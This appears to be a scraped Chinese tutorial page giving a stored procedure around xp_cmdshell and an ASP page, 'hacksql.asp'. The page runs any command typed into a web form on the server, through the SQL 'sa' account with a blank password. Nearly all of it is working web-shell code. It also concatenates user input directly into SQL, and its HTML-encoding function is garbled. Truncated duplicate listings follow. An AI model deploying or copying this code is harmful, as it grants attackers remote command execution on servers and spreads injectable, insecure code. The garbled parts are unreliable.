利用sql的存储过程实现dos命令的asp程序

程序|存储过程

1、首先在sql里面你能够访问的数据库里面建立存储过程,比如说:ddy
如下:
CREATE PROCEDURE ddy
@cmd varchar(50)
AS
exec master..xp_cmdshell @cmd
2、asp程序里如下:(hacksql.asp)
<%
cmd=trim(Request.Form("cmd"))
if cmd<>"" then
work()
else
show()
end if
function work()
set conn=server.CreateObject("adodb.connection")
set rs=server.CreateObject("adodb.recordset")
conn.Open "xx","sa",""
sql="exec ddy '"&cmd&"'"

rs.Open sql,conn
if not rs.EOF then
do while not rs.eof
Response.Write "<pre>"&htmlencode2(trim(rs(0)))&"</pre>"
rs.MoveNext
loop
else
Response.Write "no"
end if
if rs.State=1 then rs.close
set rs=nothing
conn.Close
set conn=nothing
end function
function show()
%>
<form action=hacksql.asp method=post>
请输入DOS命令:<input type=text name=cmd>
<input type=submit value="ok">
</form>
<%
end function
function htmlencode2(str)'--------转换函数(为了显示时比较工整)
dim result
dim l
if isnull(str) then
htmlencode2=""
exit function
end if
l=len(str)
result=""
dim i
for i = 1 to l
select case mid(str,i,1)
case "<"
result=result+"<"
case ">"
result=result+">"
case chr(34)
result=result+"""
case "&"
result=result+"&"
case chr(13)
result=result+"<br>"
case chr(9)
result=result+" "
case "'"
result=result+"’"
case chr(32)
result=result+" "
if i+1<=l and i-1>0 then
if mid(str,i+1,1)=chr(32) or mid(str,i+1,1)=chr(9) or mid(str,i-1,1)=chr(32) or mid(str,i-1,1)=chr(9) then
result=result+" "
else
result=result+" "
end if
else
result=result+" "
end if
case else
result=result+mid(str,i,1)
end select
next
htmlencode2=result
end function
%>

时间: 2024-10-03 02:25:19

利用sql的存储过程实现dos命令的asp程序的相关文章

利用sql的存储过程实现dos命令的asp程序(原创^

程序|存储过程|原创 1.首先在sql里面你能够访问的数据库里面建立存储过程,比如说:ddy如下:CREATE PROCEDURE ddy@cmd varchar(50)ASexec master..xp_cmdshell @cmd2.asp程序里如下:(hacksql.asp)<%cmd=trim(Request.Form("cmd"))if cmd<>"" then    work()else    show()end iffunction w

利用sql的存储过程实现dos命令的asp程序(原创^_^)

1.首先在sql里面你能够访问的数据库里面建立存储过程,比如说:ddy如下:CREATE PROCEDURE ddy@cmd varchar(50)ASexec master..xp_cmdshell @cmd2.asp程序里如下:(hacksql.asp)<%cmd=trim(Request.Form("cmd"))if cmd<>"" then    work()else    show()end iffunction work()    se

asp.net 选择excel类型文件,利用Dos命令成批复制文件_实用技巧

1.选择excel类型文件 复制代码 代码如下: OpenFileDialog fileDialog = new OpenFileDialog(); // fileDialog.InitialDirectory = "d:\\"; fileDialog.Title = "选择文件"; //fileDialog.Filter = "xml files (*.xml)|*.xml"; fileDialog.Filter = "Excel文件

利用DOS命令来对抗U盘病毒保护U盘数据_DOS/BAT

U盘的便捷性与大容量的存储性,深受着广大用户的欢迎,几乎每个用户都会人手一个,但就是这么广泛的使用,以至于U盘被病毒悄悄盯上,越来越多的病毒通过电脑.通过文件毁坏重要的数据,为了保护好U盘的数据,灭除U盘病毒成为了用户们的首要任务,下面就教大家一个小技巧,利用DOS命令来对抗U盘病毒. 利用DOS命令删除U盘病毒的步骤: 1.点击"开始→运行",输入"CMD",按回车键 2.打开命令提示符窗口,切换到U盘所在盘符或是中了Autorun.inf病毒的盘符下,依次执行下

sql字符替换与利用sql存储过程替换

如果你在替换数据库教程的指定字符串或字符,我们需要利用sql字符替换,但是对于超大容量的数据替换我们可能要用到sql存储过程替换 物,因为存储过程效率高于我们自己写的替换函数哦. update 数据表 set 字段=replace(字段,'.','') 下面看一款查询结果字符替换 --select * from sjz_dlfzb --select replace (substring(tbrq,2,len(tbrq)-2),'$','-') from sjz_dlfzb update sjz_

C#中利用process类调用外部程序以及执行dos命令

程序|执行 c#中的Process类可方便的调用外部程序,所以我们可以通过调用cmd.exe程序 加入参数 "/c " + 要执行的命令来执行一个dos命令(/c代表执行参数指定的命令后关闭cmd.exe /k参数则不关闭cmd.exe)  1         private string RunCmd(string command)     2         { 3             //實例一個Process類,啟動一個獨立進程 4             Process

win7电脑如何利用DOS命令快速修改电脑时间

  现在的很多用户都习惯在电脑或者是手机中查看时间,当然,如果正在使用电脑的话,肯定不会多此一举去拿手机了,所以说,电脑中的时间是否正确对于用户来说是非常重要的.一般来说,咱们需要修改电脑中显示的时间,其实也不算是很麻烦,直接在下方任务窗口中右键点击时间,然后选择调整日期和时间,在弹出来的窗口中进行修改即可,当然,也可以选择联网获取时间,不过除了这种方法之外,其实咱们还有一个更加简便的方法,那便是在win7旗舰版中使用DOS命令直接修改. 1.首先,同时按下win+r打开电脑的运行窗口,然后在窗

SQL Server存储过程编写与优化指南

sql语句执行的时候要先编译,然后执行.存储过程(Stored Procedure)是一组为了完成特定功能的SQL语句集,经编译后存储在数据库中.用户通过指定存储过程的名字并给出参数(如果该存储过程带有参数)来执行它.存储过程是数据库中的一个重要对象,任何一个设计良好的数据库应用程序都应该用到存储过程. 存储过程是由流控制和SQL语句书写的过程,这个过程经编译和优化后存储在数据库服务器中,应用程序使用时只要调用即可.在ORACLE中,若干个有联系的过程可以组合在一起构成程序包. 存储过程是利用S

[收藏]利用SQL Server Reporting Services 从应用程序生成用户友好的报表

server|services|程序 利用 SQL Server Reporting Services 从应用程序生成用户友好的报表 发布日期: 09/03/2004 | 更新日期: 09/03/2004John C. Hancock   http://www.microsoft.com/china/msdn/library/data/sqlserver/SQLServerReportServ.mspx本文讨论:•Reporting•设计和部署报表•使用 Reporting Services 的